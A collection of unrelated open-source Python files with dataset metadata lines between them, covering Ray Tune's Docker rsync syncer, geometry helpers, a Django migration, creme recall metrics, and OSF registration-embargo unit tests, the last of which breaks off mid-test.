return yaml.dump(data, stream, OrderedDumper, default_flow_style=default_flow_style)
def to_msgpack(data):
import msgpack
return msgpack.packb(data, use_bin_type=True, default=_msgpack_encode_datetime)
def _msgpack_encode_datetime(obj):
if isinstance(obj, datetime.datetime):
return {
'__datetime__': True,
'as_str': obj.strftime("%Y%m%dT%H:%M:%S.%f")
}
return obj
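# Round-trip sketch (illustrative, not part of the original module; the
# decoding call is an assumption about how a consumer would unpack it):
#
#   packed = to_msgpack({'when': datetime.datetime(2021, 1, 1)})
#   import msgpack
#   msgpack.unpackb(packed, raw=False)
#   # -> {'when': {'__datetime__': True, 'as_str': '20210101T00:00:00.000000'}}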
class URL(UserString):
def remove(self, param='format'):
urlparsed = urlparse(str(self))
qs = parse_qs(urlparsed.query)
qs.pop(param, None)
qs = urlencode(qs, True)
urlparsed = urlparsed._replace(query=qs)
url = urlunparse(urlparsed)
return unquote_plus(url)
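# Example (illustrative, not part of the original module):
#
#   URL('https://example.com/q?format=json&x=1').remove('format')
#   # -> 'https://example.com/q?x=1'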
| 2.28125 | 2 |
python/ray/tune/integration/docker.py | mkucijan/ray | 21,382 | 12759574 | <filename>python/ray/tune/integration/docker.py<gh_stars>1000+
import logging
import os
from typing import Optional, Tuple, List
from ray.autoscaler.sdk import rsync, configure_logging
from ray.util import get_node_ip_address
from ray.util.debug import log_once
from ray.tune.syncer import NodeSyncer
from ray.tune.sync_client import SyncClient
from ray.ray_constants import env_integer
logger = logging.getLogger(__name__)
class DockerSyncer(NodeSyncer):
"""DockerSyncer used for synchronization between Docker containers.
This syncer extends the node syncer, but is usually instantiated
without a custom sync client. The sync client defaults to
``DockerSyncClient`` instead.
Set the env var `TUNE_SYNCER_VERBOSITY` to increase verbosity
of syncing operations (0, 1, 2, 3). Defaults to 0.
.. note::
This syncer only works with the Ray cluster launcher.
If you use your own Docker setup, make sure the nodes can connect
to each other via SSH, and try the regular SSH-based syncer instead.
Example:
.. code-block:: python
from ray.tune.integration.docker import DockerSyncer
tune.run(train,
sync_config=tune.SyncConfig(
sync_to_driver=DockerSyncer))
"""
_cluster_config_file = os.path.expanduser("~/ray_bootstrap_config.yaml")
def __init__(self,
local_dir: str,
remote_dir: str,
sync_client: Optional[SyncClient] = None):
configure_logging(
log_style="record",
verbosity=env_integer("TUNE_SYNCER_VERBOSITY", 0))
self.local_ip = get_node_ip_address()
self.worker_ip = None
sync_client = sync_client or DockerSyncClient()
sync_client.configure(self._cluster_config_file)
super(NodeSyncer, self).__init__(local_dir, remote_dir, sync_client)
def set_worker_ip(self, worker_ip: str):
self.worker_ip = worker_ip
@property
def _remote_path(self) -> Tuple[str, str]:
return (self.worker_ip, self._remote_dir)
class DockerSyncClient(SyncClient):
"""DockerSyncClient to be used by DockerSyncer.
This client takes care of executing the synchronization
commands for Docker nodes. In its ``sync_down`` and
``sync_up`` commands, it expects tuples for the source
and target, respectively, for compatibility with docker.
Args:
should_bootstrap: Whether to bootstrap the autoscaler
            configuration. This may be useful when you are
            running into authentication problems; see:
https://github.com/ray-project/ray/issues/17756.
"""
def __init__(self, should_bootstrap: bool = True):
self._command_runners = {}
self._cluster_config = None
if os.environ.get("TUNE_SYNC_DISABLE_BOOTSTRAP") == "1":
should_bootstrap = False
logger.debug("Skipping bootstrap for docker sync client.")
self._should_bootstrap = should_bootstrap
def configure(self, cluster_config_file: str):
self._cluster_config_file = cluster_config_file
def sync_up(self,
source: str,
target: Tuple[str, str],
exclude: Optional[List] = None) -> bool:
"""Here target is a tuple (target_node, target_dir)"""
target_node, target_dir = target
# Add trailing slashes for rsync
source = os.path.join(source, "")
target_dir = os.path.join(target_dir, "")
import click
try:
rsync(
cluster_config=self._cluster_config_file,
source=source,
target=target_dir,
down=False,
ip_address=target_node,
should_bootstrap=self._should_bootstrap,
use_internal_ip=True)
except click.ClickException:
if log_once("docker_rsync_up_fail"):
logger.warning(
"Rsync-up failed. Consider using a durable trainable "
"or setting the `TUNE_SYNC_DISABLE_BOOTSTRAP=1` env var.")
raise
return True
def sync_down(self,
source: Tuple[str, str],
target: str,
exclude: Optional[List] = None) -> bool:
"""Here source is a tuple (source_node, source_dir)"""
source_node, source_dir = source
# Add trailing slashes for rsync
source_dir = os.path.join(source_dir, "")
target = os.path.join(target, "")
import click
try:
rsync(
cluster_config=self._cluster_config_file,
source=source_dir,
target=target,
down=True,
ip_address=source_node,
should_bootstrap=self._should_bootstrap,
use_internal_ip=True)
except click.ClickException:
if log_once("docker_rsync_down_fail"):
logger.warning(
"Rsync-down failed. Consider using a durable trainable "
"or setting the `TUNE_SYNC_DISABLE_BOOTSTRAP=1` env var.")
raise
return True
def delete(self, target: str) -> bool:
raise NotImplementedError
| 2.234375 | 2 |
model/common.py | hdiddle13/Sat2Graph | 72 | 12759575 | <filename>model/common.py
import math
import numpy as np
def neighbors_dist(neighbors, k1, k2):
a = k1[0] - k2[0]
b = k1[1] - k2[1]
return math.sqrt(a*a+b*b)
def neighbors_norm(neighbors, k1, k2):
l = neighbors_dist(neighbors, k1, k2)
a = k1[0] - k2[0]
b = k1[1] - k2[1]
return a/l, b/l
def neighbors_cos(neighbors, k1, k2, k3):
vec1 = neighbors_norm(neighbors, k2, k1)
vec2 = neighbors_norm(neighbors, k3, k1)
return vec1[0] * vec2[0] + vec1[1] * vec2[1]
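# Quick check (illustrative, not part of the original file): the cosine of the
# angle at k1 between edges (k1, k2) and (k1, k3); perpendicular edges give 0.
#
#   neighbors_cos(None, (0, 0), (1, 0), (0, 1))   # -> 0.0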
def ccw(A,B,C):
return (C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0])
# Return true if line segments AB and CD intersect
def intersect(A,B,C,D):
return ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)
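# Quick check (illustrative, not part of the original file): the diagonals of
# the unit square cross, while its two vertical edges do not.
#
#   intersect((0, 0), (1, 1), (0, 1), (1, 0))   # -> True
#   intersect((0, 0), (0, 1), (1, 0), (1, 1))   # -> False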
def distance(A,B):
a = A[0]-B[0]
b = A[1]-B[1]
return np.sqrt(a*a + b*b)
def intersectPoint(A,B,C,D):
l = distance(A,B)
min_d = 100000000000
min_p = A
for i in range(int(l)):
a = float(i)/l
x = A[0] * (1-a) + B[0]*a
y = A[1] * (1-a) + B[1]*a
d = distance((x,y),C)
d += distance((x,y),D)
if d < min_d:
min_d = d
min_p = (x,y)
return min_p
def graph_coverage(nei, p, r = 4):
    '''
    Depth-limited traversal from node p over the adjacency dict nei.
    Returns the keys of every node discovered within the depth budget r.
    '''
    visited = {}
    depth = {}
    queue = [p]
    depth[p] = 0
    visited[p] = 1
while len(queue)>0:
cp = queue.pop()
if depth[cp] > r:
continue
for n in nei[cp]:
if n not in visited:
depth[n] = depth[cp] + 1
queue.append(n)
visited[n] = 1
return visited.keys()
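# Usage sketch (illustrative, not part of the original file). Nodes are marked
# visited when discovered, so neighbors of a node at depth r still appear in
# the result (up to r + 1 hops away):
#
#   nei = {'a': ['b'], 'b': ['a', 'c'], 'c': ['b', 'd'], 'd': ['c']}
#   sorted(graph_coverage(nei, 'a', r=1))   # -> ['a', 'b', 'c']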
| 2.8125 | 3 |
backend/src/accounts/migrations/0003_auto_20180623_0213.py | rcmiskin10/mob_files | 0 | 12759576 | # Generated by Django 2.0.4 on 2018-06-23 02:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_adminprofile_businessprofile_eventprofile_participantprofile'),
]
operations = [
migrations.AlterField(
model_name='user',
name='user_type',
field=models.PositiveSmallIntegerField(blank=True, choices=[(1, 'paticipant'), (2, 'business'), (3, 'event'), (4, 'admin')], null=True),
),
]
| 1.664063 | 2 |
test/scripts/starterr.py | codders/mitmproxy | 3 | 12759577 | <gh_stars>1-10
def start(ctx, argv):
raise ValueError
| 1.140625 | 1 |
creme/metrics/recall.py | igorol/creme | 0 | 12759578 | <filename>creme/metrics/recall.py
import collections
import itertools
import statistics
from .. import stats
from . import base
from . import confusion
from . import precision
__all__ = [
'MacroRecall',
'MicroRecall',
'Recall',
'RollingMacroRecall',
'RollingMicroRecall',
'RollingRecall'
]
class BaseRecall:
@property
def bigger_is_better(self):
return True
@property
def requires_labels(self):
return True
class Recall(stats.Mean, BaseRecall, base.BinaryMetric):
"""Binary recall score.
Example:
::
>>> from creme import metrics
>>> y_true = [True, False, True, True, True]
>>> y_pred = [True, True, False, True, True]
>>> metric = metrics.Recall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
Recall: 1.
Recall: 1.
Recall: 0.5
Recall: 0.666667
Recall: 0.75
"""
def update(self, y_true, y_pred):
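        # Only positive ground truths update the running mean, so the value
        # tracked is exactly TP / (TP + FN); predictions on true negatives
        # are ignored, as recall requires.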
if y_true:
return super().update(y_true == y_pred)
return self
class MacroRecall(BaseRecall, base.MultiClassMetric):
"""Macro-average recall score.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.MacroRecall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
MacroRecall: 1.
MacroRecall: 0.5
MacroRecall: 0.666667
MacroRecall: 0.666667
MacroRecall: 0.555556
"""
def __init__(self):
self.recalls = collections.defaultdict(Recall)
self.classes = set()
def update(self, y_true, y_pred):
self.recalls[y_true].update(True, y_true == y_pred)
self.classes.update({y_true, y_pred})
return self
def get(self):
return statistics.mean((
0 if c not in self.recalls else self.recalls[c].get()
for c in self.classes
))
class MicroRecall(precision.MicroPrecision):
"""Micro-average recall score.
The micro-average recall is exactly equivalent to the micro-average precision as well as the
micro-average F1 score.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.MicroRecall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
MicroRecall: 1.
MicroRecall: 0.5
MicroRecall: 0.666667
MicroRecall: 0.75
MicroRecall: 0.6
References:
1. `Why are precision, recall and F1 score equal when using micro averaging in a multi-class problem? <https://simonhessner.de/why-are-precision-recall-and-f1-score-equal-when-using-micro-averaging-in-a-multi-class-problem/>`_
"""
class RollingRecall(BaseRecall, base.BinaryMetric):
"""Rolling binary recall score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [True, False, True, True, True]
>>> y_pred = [True, True, False, True, True]
>>> metric = metrics.RollingRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingRecall: 1.
RollingRecall: 1.
RollingRecall: 0.5
RollingRecall: 0.5
RollingRecall: 0.666667
"""
def __init__(self, window_size):
self.window_size = window_size
self.tp_ratio = stats.RollingMean(window_size=window_size)
self.fn_ratio = stats.RollingMean(window_size=window_size)
def update(self, y_true, y_pred):
self.tp_ratio.update(y_true and y_pred)
self.fn_ratio.update(y_true and not y_pred)
return self
def get(self):
tp = self.tp_ratio.get()
fn = self.fn_ratio.get()
try:
return tp / (tp + fn)
except ZeroDivisionError:
return 0.
class RollingMacroRecall(MacroRecall):
"""Rolling macro-average recall score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.RollingMacroRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingMacroRecall: 1.
RollingMacroRecall: 0.5
RollingMacroRecall: 0.666667
RollingMacroRecall: 0.333333
RollingMacroRecall: 0.333333
"""
def __init__(self, window_size):
self.window_size = window_size
self.rcm = confusion.RollingConfusionMatrix(window_size=window_size)
def update(self, y_true, y_pred):
self.rcm.update(y_true, y_pred)
return self
def get(self):
        # Use the rolling confusion matrix to count the true positives and false negatives
classes = self.rcm.classes
tps = collections.defaultdict(int)
fns = collections.defaultdict(int)
for yt, yp in itertools.product(classes, repeat=2):
if yt == yp:
tps[yp] = self.rcm.counts.get(yt, {}).get(yp, 0)
else:
fns[yp] += self.rcm.counts.get(yp, {}).get(yt, 0)
def div_or_0(a, b):
try:
return a / b
except ZeroDivisionError:
return 0.
return statistics.mean((div_or_0(tps[c], tps[c] + fns[c]) for c in classes))
class RollingMicroRecall(precision.RollingMicroPrecision):
"""Rolling micro-average recall score.
The micro-average recall is exactly equivalent to the micro-average precision as well as the
micro-average F1 score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.RollingMicroRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingMicroRecall: 1.
RollingMicroRecall: 0.5
RollingMicroRecall: 0.666667
RollingMicroRecall: 0.666667
RollingMicroRecall: 0.666667
References:
1. `Why are precision, recall and F1 score equal when using micro averaging in a multi-class problem? <https://simonhessner.de/why-are-precision-recall-and-f1-score-equal-when-using-micro-averaging-in-a-multi-class-problem/>`_
"""
| 2.34375 | 2 |
tests/test_textcaret.py | jcharistech/textcaret | 1 | 12759579 | <filename>tests/test_textcaret.py
from textcaret import __version__
from textcaret import TextCaret, TextSentiment
def test_version():
assert __version__ == '0.0.1'
def test_isTextCaret():
pass
def test_isTextSentiment():
pass
def test_TextCaret_sentiment_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.sentiment_report()
results_as_sentence = results['sentence']
results_as_sentiment = results['sentiment'].polarity
# {'sentence': 'I love apples. John hates eating onions without using a mint afterwards', 'sentiment': Sentiment(polarity=0.5, subjectivity=0.6)}
assert results_as_sentiment == 0.5
assert type(results_as_sentence) == str
def test_TextCaret_summary_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.summary_report()
assert type(results) == dict
def test_TextCaret_visual_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.visual_report()
    assert results is not None
| 2.546875 | 3 |
extract_corpus.py | EuromovDHM-SemTaxM/kit-mld-ke | 0 | 12759580 | import sys
from argparse import ArgumentParser
if __name__ == "__main__":
argv = sys.argv[1:]
parser = ArgumentParser()
if len(argv) == 0:
parser.print_help()
parser.exit(1)
parser.add_argument("dataset_path", type=str,
help="Path to the directory containing the kit-mld dataset")
parser.add_argument("--gold_format", "-g", choices=["original", "seb", "csv", "answer"], type=str, nargs=1,
dest="gold_format",
help="Format of the gold annotations. original: path to the original dataset directory to use."
"seb: a file that contains the paths of the original dataset files included in a split. "
"csv: a file that contains the dataset as a dataframe", required=False, default=["csv"]) | 2.859375 | 3 |
tests/test_registration_embargoes.py | bdyetton/prettychart | 0 | 12759581 | """Tests related to embargoes of registrations"""
import datetime
import json
import mock
from nose.tools import * #noqa
from tests.base import fake, OsfTestCase
from tests.factories import (
AuthUserFactory, EmbargoFactory, NodeFactory, ProjectFactory,
RegistrationFactory, UserFactory, UnconfirmedUserFactory
)
from framework.exceptions import PermissionsError
from modularodm.exceptions import ValidationValueError
from website.exceptions import (
InvalidEmbargoDisapprovalToken, InvalidEmbargoApprovalToken, NodeStateError,
)
from website.models import Embargo, Node
from website.project.model import ensure_schemas
class RegistrationEmbargoModelsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoModelsTestCase, self).setUp()
self.user = UserFactory()
self.project = ProjectFactory(creator=self.user)
self.registration = RegistrationFactory(project=self.project)
self.embargo = EmbargoFactory(user=self.user)
self.valid_embargo_end_date = datetime.datetime.utcnow() + datetime.timedelta(days=3)
# Validator tests
def test_invalid_state_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.embargo.state = 'not a valid state'
self.embargo.save()
# Node#_initiate_embargo tests
def test__initiate_embargo_does_not_save_embargo(self):
initial_count = Embargo.find().count()
self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True
)
self.assertEqual(Embargo.find().count(), initial_count)
def test__initiate_embargo_does_not_create_tokens_for_unregistered_admin(self):
unconfirmed_user = UnconfirmedUserFactory()
self.registration.contributors.append(unconfirmed_user)
self.registration.add_permission(unconfirmed_user, 'admin', save=True)
assert_true(self.registration.has_permission(unconfirmed_user, 'admin'))
embargo = self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True
)
assert_true(self.user._id in embargo.approval_state)
assert_false(unconfirmed_user._id in embargo.approval_state)
def test__initiate_embargo_with_save_does_save_embargo(self):
initial_count = Embargo.find().count()
self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True,
save=True
)
self.assertEqual(Embargo.find().count(), initial_count + 1)
# Backref tests
def test_embargo_initiator_has_backref(self):
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
self.registration.reload()
assert_equal(len(self.user.embargo__embargoed), 1)
# Node#embargo_registration tests
def test_embargo_from_non_admin_raises_PermissionsError(self):
self.registration.remove_permission(self.user, 'admin')
self.registration.save()
self.registration.reload()
with assert_raises(PermissionsError):
self.registration.embargo_registration(self.user, self.valid_embargo_end_date)
def test_embargo_end_date_in_past_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime(1999, 1, 1)
)
def test_embargo_end_date_today_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow()
)
def test_embargo_end_date_in_far_future_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime(2099, 1, 1)
)
def test_embargo_with_valid_end_date_starts_pending_embargo(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
def test_embargo_public_project_makes_private_pending_embargo(self):
self.registration.is_public = True
assert_true(self.registration.is_public)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
assert_false(self.registration.is_public)
def test_embargo_non_registration_raises_NodeStateError(self):
self.registration.is_registration = False
self.registration.save()
with assert_raises(NodeStateError):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
assert_false(self.registration.pending_embargo)
# Embargo#approve_embargo tests
def test_invalid_approval_token_raises_InvalidEmbargoApprovalToken(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
invalid_approval_token = 'not a real token'
with assert_raises(InvalidEmbargoApprovalToken):
self.registration.embargo.approve_embargo(self.user, invalid_approval_token)
assert_true(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_non_admin_approval_token_raises_PermissionsError(self):
non_admin = UserFactory()
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
with assert_raises(PermissionsError):
self.registration.embargo.approve_embargo(non_admin, approval_token)
assert_true(self.registration.pending_embargo)
def test_one_approval_with_one_admin_embargoes(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
def test_approval_adds_to_parent_projects_log(self):
initial_project_logs = len(self.registration.registered_from.logs)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
# Logs: Created, registered, embargo initiated, embargo approved
assert_equal(len(self.registration.registered_from.logs), initial_project_logs + 2)
def test_one_approval_with_two_admins_stays_pending(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
# First admin approves
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.pending_embargo)
num_of_approvals = sum([val['has_approved'] for val in self.registration.embargo.approval_state.values()])
assert_equal(num_of_approvals, 1)
# Second admin approves
approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
self.registration.embargo.approve_embargo(admin2, approval_token)
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
num_of_approvals = sum([val['has_approved'] for val in self.registration.embargo.approval_state.values()])
assert_equal(num_of_approvals, 2)
# Embargo#disapprove_embargo tests
def test_invalid_disapproval_token_raises_InvalidEmbargoDisapprovalToken(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
with assert_raises(InvalidEmbargoDisapprovalToken):
self.registration.embargo.disapprove_embargo(self.user, fake.sentence())
assert_true(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_non_admin_disapproval_token_raises_PermissionsError(self):
non_admin = UserFactory()
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
with assert_raises(PermissionsError):
self.registration.embargo.disapprove_embargo(non_admin, disapproval_token)
assert_true(self.registration.pending_embargo)
def test_one_disapproval_cancels_embargo(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_disapproval_adds_to_parent_projects_log(self):
initial_project_logs = len(self.registration.registered_from.logs)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
registered_from = self.registration.registered_from
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
# Logs: Created, registered, embargo initiated, embargo cancelled
assert_equal(len(registered_from.logs), initial_project_logs + 2)
def test_cancelling_embargo_deletes_parent_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_true(self.registration.is_deleted)
def test_cancelling_embargo_for_existing_registration_does_not_delete_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.is_deleted)
# Embargo property tests
def test_new_registration_is_pending_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_registration)
def test_existing_registration_is_not_pending_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
assert_false(self.registration.pending_registration)
class RegistrationWithChildNodesEmbargoModelTestCase(OsfTestCase):
def setUp(self):
super(RegistrationWithChildNodesEmbargoModelTestCase, self).setUp()
self.user = AuthUserFactory()
self.auth = self.user.auth
self.valid_embargo_end_date = datetime.datetime.utcnow() + datetime.timedelta(days=3)
self.project = ProjectFactory(title='Root', is_public=False, creator=self.user)
self.component = NodeFactory(
creator=self.user,
parent=self.project,
title='Component'
)
self.subproject = ProjectFactory(
creator=self.user,
parent=self.project,
title='Subproject'
)
self.subproject_component = NodeFactory(
creator=self.user,
parent=self.subproject,
title='Subcomponent'
)
self.registration = RegistrationFactory(project=self.project)
# Reload the registration; else tests won't catch failures to save
self.registration.reload()
def test_approval_embargoes_descendant_nodes(self):
# Initiate embargo for parent registration
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
assert_true(self.registration.pending_embargo)
# Ensure descendant nodes are pending embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.pending_embargo)
# Approve parent registration's embargo
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.embargo.embargo_end_date)
# Ensure descendant nodes are in embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.embargo_end_date)
def test_disapproval_cancels_embargo_on_descendant_nodes(self):
# Initiate embargo on parent registration
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
assert_true(self.registration.pending_embargo)
# Ensure descendant nodes are pending embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.pending_embargo)
# Disapprove parent registration's embargo
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_false(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
# Ensure descendant nodes' embargoes are cancelled
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_false(node.pending_embargo)
assert_false(node.embargo_end_date)
class RegistrationEmbargoApprovalDisapprovalViewsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoApprovalDisapprovalViewsTestCase, self).setUp()
self.user = AuthUserFactory()
self.registration = RegistrationFactory(creator=self.user)
# node_registration_embargo_approve tests
def test_GET_from_unauthorized_user_raises_HTTPForbidden(self):
unauthorized_user = AuthUserFactory()
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=unauthorized_user.auth,
expect_errors=True
)
assert_equal(res.status_code, 403)
def test_GET_approve_registration_without_embargo_raises_HTTPBad_Request(self):
assert_false(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_invalid_token_returns_HTTPBad_Request(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_wrong_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=wrong_approval_token),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_wrong_admins_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=wrong_approval_token),
auth=self.user.auth,
expect_errors=True
)
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_approve_with_valid_token_returns_redirect(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=approval_token),
auth=self.user.auth,
)
self.registration.embargo.reload()
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
assert_equal(res.status_code, 302)
# node_registration_embargo_disapprove tests
def test_GET_from_unauthorized_user_returns_HTTPForbidden(self):
unauthorized_user = AuthUserFactory()
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=unauthorized_user.auth,
expect_errors=True
)
assert_equal(res.status_code, 403)
def test_GET_disapprove_registration_without_embargo_HTTPBad_Request(self):
assert_false(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_invalid_token_returns_HTTPBad_Request(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=self.user.auth,
